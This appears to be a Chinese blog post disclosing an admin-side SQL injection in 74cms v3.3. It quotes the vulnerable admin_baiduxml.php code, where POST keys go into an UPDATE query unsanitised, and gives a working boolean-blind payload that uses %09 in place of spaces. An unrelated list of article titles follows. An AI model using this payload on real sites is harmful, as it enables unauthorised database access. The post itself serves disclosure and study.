74cms v3.3 后台SQL注入
2024-10-20 01:39:01
注入存在于后台 admin_baiduxml.php
代码 52-63行
elseif($act == 'setsave')
{
$_POST['xmlmax']=intval($_POST['xmlmax']);
$_POST['xmlpagesize']=intval($_POST['xmlpagesize'])==0?1:intval($_POST['xmlpagesize']);
foreach($_POST as $k => $v)
{
!$db->query("UPDATE ".table('baiduxml')." SET value='{$v}' WHERE name='{$k}'")?adminmsg('保存失败', 1):"";
}
refresh_cache('baiduxml');
adminmsg("保存成功!",2);
}
这里可以看到 用了 foreach 对 $POST 进行遍历,没有对$k 进行处理
!$db->query("UPDATE ".table('baiduxml')." SET value='{$v}' WHERE name='{$k}'")?adminmsg('保存失败', 1):"";
虽然上面两行对 xmlmax 和 xmlpagesize进行了 intval操作,但是用户可以提交如下数据 那么这里b参数就没有进行任何处理导致注入
xmlmax=111&xmlpagesize=112&b=aaa
空格变为了_
可以用%09 代替 空格
最后bool盲注 payload:
xmlmax=111&xmlpagesize=112&b'or%09if(1%3d(select%091%09REGEXP%09if(1%3d12,1,0x00)),1,1)%23=aaa
最新文章
- 使用Node.JS访问Hyperledger Fabric的gRPC服务
- 获取MAC地址的几种方式
- DBAccess
- 02 Linux 下安装JDK并测试开发“Hello World!”
- WPF好看的进度条实现浅谈(效果有点类似VS2012安装界面)
- 解决xubuntu的thunar第一次启动慢
- graph-tool文档(一)- 快速开始使用Graph-tool - 1.创建和操纵图
- Xamarin.Android 入门之:Listview和adapter
- bnuoj 1053 EASY Problem (计算几何)
- C#日期时间格式化
- CentOS 7.0 安装 python3.X 脚本
- spring mvc 全局异常处理
- 定义block块
- new关键字的理解-问题型
- ubuntu系统普通用户sudo命令执行报错解决方案
- React+webpack-Module Parse failed, Unexpected Character ‘ ’
- HDU-problem-1002-人类史上最大最好的希望事件-矩阵快速幂
- Orleans学习总结(一)--入门认识
- 2.5 C++类class和结构体struct区别
- IIS下使用 HTTP/2
热门文章
- Vue2中父子组件通信的几种常用方法
- i春秋-Phone number(union注入+hex转码)
- Java线程基础及多线程的实现
- 【LeetCode】316. 去除重复字母
- Linux 中的虚拟网络接口
- rancherUI添加configmap
- Semi-automation Script Based on Sleep
- Easylogging++的使用及扩展
- spring boot 整合JPA bean注入失败
- C# 二维数组 [,]与[][] 的区别 及特性